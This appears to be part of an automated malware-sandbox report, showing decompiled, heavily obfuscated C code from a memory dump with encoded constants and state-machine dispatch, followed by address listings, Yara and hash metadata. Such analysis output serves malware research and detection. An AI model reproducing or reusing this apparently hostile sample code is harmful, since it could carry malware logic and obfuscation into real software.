						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x24ca20; // 0x0
						_t397 = E00241B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0023F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00235F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x24ca20; // 0x0
						_t392 = E00238010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x24ca20; // 0x0
					_t395 = E00240A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}











































































                                                      0x0023f993
                                                      0x0023f99d
                                                      0x0023f9a4
                                                      0x0023f9a6
                                                      0x0023f9ad
                                                      0x0023f9b4
                                                      0x0023f9b5
                                                      0x0023f9b7
                                                      0x0023f9bc
                                                      0x0023f9c7
                                                      0x0023f9ca
                                                      0x0023f9d9
                                                      0x0023f9db
                                                      0x0023f9e0
                                                      0x0023f9e6
                                                      0x0023f9e9
                                                      0x0023f9ed
                                                      0x0023f9f5
                                                      0x0023fa02
                                                      0x0023fa06
                                                      0x0023fa0e
                                                      0x0023fa16
                                                      0x0023fa1e
                                                      0x0023fa23
                                                      0x0023fa28
                                                      0x0023fa30
                                                      0x0023fa3b
                                                      0x0023fa46
                                                      0x0023fa51
                                                      0x0023fa5f
                                                      0x0023fa60
                                                      0x0023fa66
                                                      0x0023fa6e
                                                      0x0023fa76
                                                      0x0023fa81
                                                      0x0023fa8c
                                                      0x0023fa97
                                                      0x0023fa9f
                                                      0x0023faa3
                                                      0x0023faab
                                                      0x0023fab3
                                                      0x0023fabb
                                                      0x0023facb
                                                      0x0023fad5
                                                      0x0023fada
                                                      0x0023fade
                                                      0x0023fae6
                                                      0x0023faee
                                                      0x0023faf6
                                                      0x0023fafe
                                                      0x0023fb06
                                                      0x0023fb0e
                                                      0x0023fb19
                                                      0x0023fb24
                                                      0x0023fb2f
                                                      0x0023fb3a
                                                      0x0023fb45
                                                      0x0023fb52
                                                      0x0023fb5e
                                                      0x0023fb63
                                                      0x0023fb69
                                                      0x0023fb6e
                                                      0x0023fb76
                                                      0x0023fb7e
                                                      0x0023fb89
                                                      0x0023fb91
                                                      0x0023fb9c
                                                      0x0023fbaf
                                                      0x0023fbb2
                                                      0x0023fbb9
                                                      0x0023fbc4
                                                      0x0023fbcc
                                                      0x0023fbdc
                                                      0x0023fbe0
                                                      0x0023fbe8
                                                      0x0023fbf3
                                                      0x0023fbfa
                                                      0x0023fc05
                                                      0x0023fc0d
                                                      0x0023fc15
                                                      0x0023fc1d
                                                      0x0023fc25
                                                      0x0023fc2d
                                                      0x0023fc38
                                                      0x0023fc43
                                                      0x0023fc4e
                                                      0x0023fc5a
                                                      0x0023fc5f
                                                      0x0023fc65
                                                      0x0023fc6d
                                                      0x0023fc75
                                                      0x0023fc7d
                                                      0x0023fc82
                                                      0x0023fc8a
                                                      0x0023fc92
                                                      0x0023fc9a
                                                      0x0023fca2
                                                      0x0023fca7
                                                      0x0023fcaf
                                                      0x0023fcb7
                                                      0x0023fcbc
                                                      0x0023fcc1
                                                      0x0023fcc9
                                                      0x0023fcd1
                                                      0x0023fcd9
                                                      0x0023fce3
                                                      0x0023fce4
                                                      0x0023fce8
                                                      0x0023fcf0
                                                      0x0023fcf8
                                                      0x0023fd06
                                                      0x0023fd0a
                                                      0x0023fd12
                                                      0x0023fd1a
                                                      0x0023fd22
                                                      0x0023fd27
                                                      0x0023fd2f
                                                      0x0023fd37
                                                      0x0023fd3f
                                                      0x0023fd47
                                                      0x0023fd4c
                                                      0x0023fd54
                                                      0x0023fd5c
                                                      0x0023fd6c
                                                      0x0023fd71
                                                      0x0023fd77
                                                      0x0023fd7f
                                                      0x0023fd8b
                                                      0x0023fd90
                                                      0x0023fd96
                                                      0x0023fd9e
                                                      0x0023fda6
                                                      0x0023fdae
                                                      0x0023fdb6
                                                      0x0023fdbe
                                                      0x0023fdcb
                                                      0x0023fdcc
                                                      0x0023fdd0
                                                      0x0023fdd5
                                                      0x0023fddd
                                                      0x0023fde5
                                                      0x0023fded
                                                      0x0023fdf2
                                                      0x0023fdfa
                                                      0x0023fe02
                                                      0x0023fe0a
                                                      0x0023fe12
                                                      0x0023fe1a
                                                      0x0023fe22
                                                      0x0023fe2f
                                                      0x0023fe39
                                                      0x0023fe3d
                                                      0x0023fe45
                                                      0x0023fe4c
                                                      0x0023fe4c
                                                      0x0023fe4c
                                                      0x0023fe50
                                                      0x0023fe50
                                                      0x0023fe50
                                                      0x0023fe56
                                                      0x00000000
                                                      0x00000000
                                                      0x0023ff96
                                                      0x0024009f
                                                      0x002400ca
                                                      0x002400cf
                                                      0x002400d3
                                                      0x002400d6
                                                      0x002400dc
                                                      0x00000000
                                                      0x00000000
                                                      0x002400e4
                                                      0x002400e9
                                                      0x002400ea
                                                      0x002400ee
                                                      0x002400f4
                                                      0x00240117
                                                      0x00240125
                                                      0x00240125
                                                      0x0023fe4c
                                                      0x0023fe4c
                                                      0x0023fe4c
                                                      0x00000000
                                                      0x0023fe4c
                                                      0x0023fe4c
                                                      0x0023ffa2
                                                      0x00240082
                                                      0x00240087
                                                      0x0024008a
                                                      0x0023fee7
                                                      0x0023fee7
                                                      0x00000000
                                                      0x0023fee7
                                                      0x0023ffae
                                                      0x00240001
                                                      0x00240004
                                                      0x00240009
                                                      0x00240009
                                                      0x0024000f
                                                      0x00240021
                                                      0x00240022
                                                      0x0024002b
                                                      0x0024002d
                                                      0x00240033
                                                      0x00000000
                                                      0x00240039
                                                      0x0024003c
                                                      0x0024003c
                                                      0x00240045
                                                      0x0024004c
                                                      0x00240051
                                                      0x00240055
                                                      0x00240059
                                                      0x00000000
                                                      0x00240059
                                                      0x00240033
                                                      0x0023ffb6
                                                      0x00000000
                                                      0x00000000
                                                      0x0023ffca
                                                      0x0023ffdf
                                                      0x0023ffe4
                                                      0x0023ffeb
                                                      0x0023fff3
                                                      0x00000000
                                                      0x0023fff3
                                                      0x0023fe5c
                                                      0x002400fd
                                                      0x00240110
                                                      0x00240116
                                                      0x00000000
                                                      0x002400fd
                                                      0x0023fe68
                                                      0x0023ff86
                                                      0x00000000
                                                      0x0023ff86
                                                      0x0023fe74
                                                      0x0023ff73
                                                      0x0023ff74
                                                      0x0023ff75
                                                      0x0023ff7c
                                                      0x00000000
                                                      0x0023ff7c
                                                      0x0023fe80
                                                      0x0023fef4
                                                      0x0023ff19
                                                      0x0023ff2c
                                                      0x0023ff31
                                                      0x0023ff36
                                                      0x0023ff59
                                                      0x00000000
                                                      0x0023ff59
                                                      0x0023ff38
                                                      0x0023ff3f
                                                      0x0023ff41
                                                      0x0023ff43
                                                      0x0023ff45
                                                      0x0023ff46
                                                      0x0023ff4e
                                                      0x0023ff52
                                                      0x00000000
                                                      0x0023ff52
                                                      0x0023fe88
                                                      0x00000000
                                                      0x00000000
                                                      0x0023fe8e
                                                      0x0023fecd
                                                      0x0023fed2
                                                      0x0023fed9
                                                      0x0023fee1
                                                      0x00000000
                                                      0x0023fee1

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                                      • API String ID: 0-11970308
                                                      • Opcode ID: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
                                                      • Instruction ID: a6e9b9997d9ff287688e68dd1a56c2e20396b586140668c3e912996a57acf700
                                                      • Opcode Fuzzy Hash: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
                                                      • Instruction Fuzzy Hash: 961245B25183808FD368CF25C989A4BBBF1BBC4314F108A1DF6D9862A0D7B59959CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00231CFA, Relevance: 18.0, Strings: 14, Instructions: 503COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00231CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0023602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x24ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0023C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x24ca20; // 0x0
								_t554 =  *0x24ca20; // 0x0
								_t555 = E0023F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00249465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00238736(_t597);
									 *0x24ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x24ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002387FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x24ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0024AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x24ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00241A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002375AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x24ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0024AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x24ca20; // 0x0
								_t592 =  *0x24ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002366C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0023F536(_v92, _v100, _v108,  *0x24ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}
































































































                                                      0x00231d01
                                                      0x00231d0b
                                                      0x00231d0c
                                                      0x00231d0e
                                                      0x00231d13
                                                      0x00231d1e
                                                      0x00231d21
                                                      0x00231d2c
                                                      0x00231d2e
                                                      0x00231d37
                                                      0x00231d3f
                                                      0x00231d4a
                                                      0x00231d4f
                                                      0x00231d55
                                                      0x00231d5d
                                                      0x00231d65
                                                      0x00231d70
                                                      0x00231d7b
                                                      0x00231d86
                                                      0x00231d91
                                                      0x00231d9c
                                                      0x00231da7
                                                      0x00231db2
                                                      0x00231dbd
                                                      0x00231dd3
                                                      0x00231dde
                                                      0x00231de6
                                                      0x00231df1
                                                      0x00231df9
                                                      0x00231dfe
                                                      0x00231e06
                                                      0x00231e0e
                                                      0x00231e16
                                                      0x00231e1e
                                                      0x00231e26
                                                      0x00231e2e
                                                      0x00231e36
                                                      0x00231e42
                                                      0x00231e47
                                                      0x00231e52
                                                      0x00231e53
                                                      0x00231e57
                                                      0x00231e5f
                                                      0x00231e67
                                                      0x00231e6f
                                                      0x00231e77
                                                      0x00231e7f
                                                      0x00231e87
                                                      0x00231e92
                                                      0x00231ea6
                                                      0x00231ead
                                                      0x00231eb8
                                                      0x00231ec3
                                                      0x00231ecb
                                                      0x00231ed3
                                                      0x00231ede
                                                      0x00231ee9
                                                      0x00231ef1
                                                      0x00231efc
                                                      0x00231f07
                                                      0x00231f19
                                                      0x00231f23
                                                      0x00231f28
                                                      0x00231f2e
                                                      0x00231f33
                                                      0x00231f3b
                                                      0x00231f43
                                                      0x00231f4b
                                                      0x00231f4f
                                                      0x00231f54
                                                      0x00231f5c
                                                      0x00231f6e
                                                      0x00231f73
                                                      0x00231f7c
                                                      0x00231f87
                                                      0x00231f92
                                                      0x00231f9d
                                                      0x00231fa8
                                                      0x00231fb0
                                                      0x00231fbc
                                                      0x00231fc1
                                                      0x00231fc7
                                                      0x00231fcf
                                                      0x00231fd7
                                                      0x00231fe2
                                                      0x00231fed
                                                      0x00231ff8
                                                      0x00232003
                                                      0x0023200b
                                                      0x00232018
                                                      0x0023201b
                                                      0x0023201f
                                                      0x00232027
                                                      0x0023202f
                                                      0x00232037
                                                      0x0023203f
                                                      0x00232047
                                                      0x0023204c
                                                      0x00232054
                                                      0x0023205f
                                                      0x0023206a
                                                      0x00232075
                                                      0x0023208b
                                                      0x00232092
                                                      0x0023209d
                                                      0x002320a8
                                                      0x002320b0
                                                      0x002320b8
                                                      0x002320c0
                                                      0x002320c8
                                                      0x002320d0
                                                      0x002320db
                                                      0x002320e3
                                                      0x002320ee
                                                      0x00232100
                                                      0x00232103
                                                      0x0023210a
                                                      0x00232115
                                                      0x00232120
                                                      0x0023212d
                                                      0x00232138
                                                      0x00232140
                                                      0x00232145
                                                      0x0023214a
                                                      0x00232152
                                                      0x0023215a
                                                      0x0023215f
                                                      0x00232167
                                                      0x0023216f
                                                      0x0023217a
                                                      0x00232182
                                                      0x0023218d
                                                      0x00232198
                                                      0x002321a0
                                                      0x002321ab
                                                      0x002321b6
                                                      0x002321be
                                                      0x002321c6
                                                      0x002321ce
                                                      0x002321d6
                                                      0x002321de
                                                      0x002321e6
                                                      0x002321eb
                                                      0x002321f3
                                                      0x002321fb
                                                      0x00232203
                                                      0x0023220b
                                                      0x00232213
                                                      0x0023221b
                                                      0x00232223
                                                      0x0023222e
                                                      0x00232243
                                                      0x00232246
                                                      0x0023224d
                                                      0x00232258
                                                      0x00232268
                                                      0x0023226c
                                                      0x00232274
                                                      0x0023227c
                                                      0x00232284
                                                      0x0023228c
                                                      0x00232291
                                                      0x00232299
                                                      0x002322a1
                                                      0x002322a9
                                                      0x002322b2
                                                      0x002322b7
                                                      0x002322bd
                                                      0x002322c5
                                                      0x002322cd
                                                      0x002322d5
                                                      0x002322da
                                                      0x002322e7
                                                      0x002322e8
                                                      0x002322ec
                                                      0x002322f4
                                                      0x00232308
                                                      0x0023230f
                                                      0x0023231a
                                                      0x00232325
                                                      0x00232330
                                                      0x0023233b
                                                      0x00232343
                                                      0x0023234b
                                                      0x00232360
                                                      0x00232365
                                                      0x0023236b
                                                      0x00232373
                                                      0x0023237b
                                                      0x00232388
                                                      0x0023238b
                                                      0x0023238f
                                                      0x00232394
                                                      0x0023239c
                                                      0x002323a4
                                                      0x002323ac
                                                      0x002323b4
                                                      0x002323bc
                                                      0x002323c7
                                                      0x002323cf
                                                      0x002323da
                                                      0x002323ed
                                                      0x002323f4
                                                      0x002323ff
                                                      0x00232407
                                                      0x0023240f
                                                      0x00232417
                                                      0x0023241f
                                                      0x00232427
                                                      0x0023242f
                                                      0x00232437
                                                      0x0023243f
                                                      0x00232447
                                                      0x00232457
                                                      0x0023245b
                                                      0x00232467
                                                      0x0023246a
                                                      0x0023246e
                                                      0x00232476
                                                      0x00232481
                                                      0x0023248c
                                                      0x00232497
                                                      0x002324a2
                                                      0x002324ad
                                                      0x002324b8
                                                      0x002324c3
                                                      0x002324ce
                                                      0x002324d9
                                                      0x002324e1
                                                      0x002324e6
                                                      0x002324ee
                                                      0x002324f6
                                                      0x002324f6
                                                      0x002324fe
                                                      0x002324fe
                                                      0x002324fe
                                                      0x002324fe
                                                      0x00232504
                                                      0x00000000
                                                      0x00000000
                                                      0x0023250a
                                                      0x00232686
                                                      0x00232687
                                                      0x002326a7
                                                      0x002326b1
                                                      0x002326b4
                                                      0x002326b9
                                                      0x002326c0
                                                      0x002326c8
                                                      0x00000000
                                                      0x00232510
                                                      0x00232516
                                                      0x00232620
                                                      0x00232644
                                                      0x00232657
                                                      0x00232669
                                                      0x0023266f
                                                      0x00232677
                                                      0x00232679
                                                      0x0023267e
                                                      0x00000000
                                                      0x0023251c
                                                      0x00232522
                                                      0x002325f6
                                                      0x002325fa
                                                      0x002325fb
                                                      0x00232600
                                                      0x00232606
                                                      0x00232609
                                                      0x0023260f
                                                      0x00000000
                                                      0x0023260f
                                                      0x00232528
                                                      0x0023252a
                                                      0x002325cf
                                                      0x002325d5
                                                      0x002325d8
                                                      0x002325dd
                                                      0x002325e0
                                                      0x00000000
                                                      0x00232530
                                                      0x00232536
                                                      0x002325a0
                                                      0x002325a5
                                                      0x002325a6
                                                      0x002325aa
                                                      0x002325af
                                                      0x002325b2
                                                      0x00000000
                                                      0x00232538
                                                      0x0023253e
                                                      0x00000000
                                                      0x00232544
                                                      0x00232567
                                                      0x0023256d
                                                      0x0023256d
                                                      0x00232573
                                                      0x00232578
